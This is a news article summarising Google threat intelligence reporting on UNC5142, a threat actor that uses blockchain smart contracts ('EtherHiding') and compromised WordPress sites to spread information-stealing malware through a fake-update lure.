Cybercriminals are increasingly leveraging blockchain technology and compromised websites to distribute malware. A financially motivated threat actor, identified as UNC5142, is using blockchain smart contracts and infected WordPress sites to spread information-stealing malware. This sophisticated technique blends legitimate Web3 activity with malicious intent, making detection and takedown efforts more challenging for security researchers.

Key Takeaways

• Threat actor UNC5142 is using blockchain smart contracts and compromised WordPress sites to distribute malware.

• The technique, dubbed 'EtherHiding,' embeds malicious code on public blockchains like BNB Smart Chain.

• Malware includes information stealers such as Atomic, Lumma, Rhadamanthys, and Vidar, targeting Windows and macOS.

• Attackers use a multi-stage JavaScript downloader called CLEARSHORT, a variant of ClearFake.

• Blockchain's mutable data allows attackers to update payload URLs efficiently and cost-effectively.

The EtherHiding Technique

UNC5142 employs a method called 'EtherHiding,' which involves placing malicious code or data on public blockchains, such as the BNB Smart Chain. This approach allows the attackers to use decentralized systems as a resilient hosting network for their malware. Google Threat Intelligence Group (GTIG) reported that as of June 2025, approximately 14,000 web pages with injected JavaScript exhibited behavior associated with UNC5142, indicating widespread targeting of vulnerable WordPress sites.

The CLEARSHORT Infection Chain

The attack chain relies on a multi-stage JavaScript downloader named CLEARSHORT. The initial JavaScript malware, injected into WordPress plugins, themes, or databases, retrieves a second-stage payload by interacting with a malicious smart contract on the BNB Smart Chain. This smart contract then fetches a CLEARSHORT landing page, often hosted on Cloudflare .dev pages, which uses social engineering tactics like fake browser update warnings (ClickFix) to trick users into executing malicious commands. On Windows, this leads to the execution of an HTML Application (HTA) file, while on macOS, it involves running a bash command in the Terminal.

Blockchain as an Advantage for Attackers

The use of blockchain smart contracts offers significant advantages to threat actors. It allows them to blend in with legitimate Web3 activities and increases the resilience of their operations against detection and takedown efforts. UNC5142 has evolved its infrastructure, moving from a single-contract system to a more sophisticated three-smart contract architecture. This design, based on the proxy pattern, separates router, logic, and storage functions, enabling rapid updates to critical components like landing page URLs or decryption keys without altering the code on compromised websites. These updates are cost-effective, ranging from $0.25 to $1.50 in network fees, providing considerable operational agility.

Evolving Threat Landscape

Google has not observed new UNC5142 campaigns since July 23, 2025, which could indicate a pause or a shift in their operations. However, security experts warn that this model of exploiting blockchain for malware delivery could inspire copycat attacks. The fusion of the anonymity offered by crypto ecosystems with the scalability of automated malware delivery presents a significant challenge to traditional cybersecurity defenses and takedown strategies.

Key Takeaways

• Hackers Abuse Blockchain Smart Contracts to Spread Malware via Infected WordPress Sites, The Hacker News.

• Google Warns of Blockchain Exploitation in Massive Malware Campaign, The420.in.